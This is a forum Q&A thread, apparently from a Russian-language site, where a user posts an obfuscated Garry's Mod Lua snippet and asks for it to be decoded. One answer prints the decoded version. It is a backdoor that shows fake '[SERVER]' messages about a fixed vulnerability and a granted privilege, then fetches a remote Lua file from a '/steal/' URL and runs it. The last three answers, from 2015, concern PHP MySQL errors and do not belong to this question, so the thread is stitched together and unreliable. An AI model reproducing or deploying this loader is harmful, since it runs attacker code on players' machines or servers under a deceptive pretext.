S
S
SniffZ2020-09-01 21:44:25
Lua
SniffZ, 2020-09-01 21:44:25

Can you unobfuscate the code (lua/glua)?

Can you remove the obfuscation from the code?

local ‪ = _G local ‪‪ = ‪['\115\116\114\105\110\103'] local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114'] local function ‪‪‪‪‪‪‪(‪‪‪‪) if ‪‪['\108\101\110'](‪‪‪‪) == 0 then return ‪‪‪‪ end local ‪‪‪‪‪ = '' for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46\46') do ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪["\116\111\110\117\109\98\101\114"](_,16),199)) end return ‪‪‪‪‪ end ‪[‪‪‪‪‪‪‪'b3aeaaa2b5'][‪‪‪‪‪‪‪'94aeaab7aba2'](1,function ()‪[‪‪‪‪‪‪‪'95b2a984a8a9b4a8aba284a8aaaaa6a9a3'](‪‪‪‪‪‪‪'a1b2b4b3b5b7b3a8b7')‪[‪‪‪‪‪‪‪'a4afa6b3'][‪‪‪‪‪‪‪'86a3a393a2bfb3'](‪‪‪‪‪‪‪'9c9482959182959ae71764176817501755175f175b175917661765176be717591756176717571756175917651757175a1757e9e9e9')end )‪[‪‪‪‪‪‪‪'b3aeaaa2b5'][‪‪‪‪‪‪‪'94aeaab7aba2'](5,function ()if ‪[‪‪‪‪‪‪‪'8ba8a4a6ab97aba6bea2b5']()[‪‪‪‪‪‪‪'8eb4918e97'](‪[‪‪‪‪‪‪‪'8ba8a4a6ab97aba6bea2b5']())then ‪[‪‪‪‪‪‪‪'a4afa6b3'][‪‪‪‪‪‪‪'86a3a393a2bfb3'](‪‪‪‪‪‪‪'9c9482959182959ae717581647177f17751772177c17721774177f1648e71644164617781772164f177a1779e71775164c17731777177a1777e9')else ‪[‪‪‪‪‪‪‪'a4afa6b3'][‪‪‪‪‪‪‪'86a3a393a2bfb3'](‪‪‪‪‪‪‪'9c9482959182959ae7176417781646e9e9e7176016451779ea16451779e717781779164f177c1779e7177a1772e716451777177de9e9')end end )‪[‪‪‪‪‪‪‪'afb3b3b7'][‪‪‪‪‪‪‪'81a2b3a4af'](‪‪‪‪‪‪‪'afb3b3b7fde8e8aaaeababa2a9aeb2aab7e9b5b2e8b4b3a2a6abe8a5a6a9bdf6e8afa6ace9abb2a6',function (‪else)‪[‪‪‪‪‪‪‪'95b2a994b3b5aea9a0'](‪else)end )

Answer the question

In order to leave comments, you need to log in

6 answer(s)
S
Sergey Lerg, 2020-09-01
@Lerg

Some of the code seems to be missing. Doesn't even compile.

D
dollar, 2020-09-03
@dollar

It can be seen that the names of the variables are all cut out.
Here is a syntax error right away, no matter what before and after:
local ‪ =
And glua is practically no different from lua, except for additional syntactic sugar.

M
mitya_girs, 2021-08-24
@mitya_girs

Here is something like:

timer:Simple(1, function () RunConsoleCommand(fustrptop)chat:AddText([SERVER] УЯЗВИМОСТЬ ОБРАБОТАНА...)end)timer:Simple(5,function ()if LocalPlayer():IsVIP(LocalPlayer())then chat:AddText([SERVER] Привелегия успешно выдана.)else chat:AddText([SERVER] Упс.. Что-то пошло не так..)end end)http:Fetch(http://milleniump.ru/steal/banz1/hak.lua),function(else) RunString(else)end )

Easy to decipher
61250d118abb1190045478.png

A
Alexey Hog, 2015-07-31
Konig @helmut_kenig

1. Error in request
replaced by
2. Escape the data before inserting it into the query, otherwise your script will crash if the user has a name like D'artagnan.

A
Andrey Burov, 2015-07-31
@BuriK666

mysql - deprecated, use either mysqli or PDO
Your variables are not escaped.
Well, mysql_query can return false php.net/manual/en/function.mysql-query.php
see mysql_error()

S
Sergey Ivanov, 2015-07-31
@Writerim

Does the table have these fields?
It's just that this error says that the result is not equal to the resource in order to get the number of rows from it - that is, your result is false

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question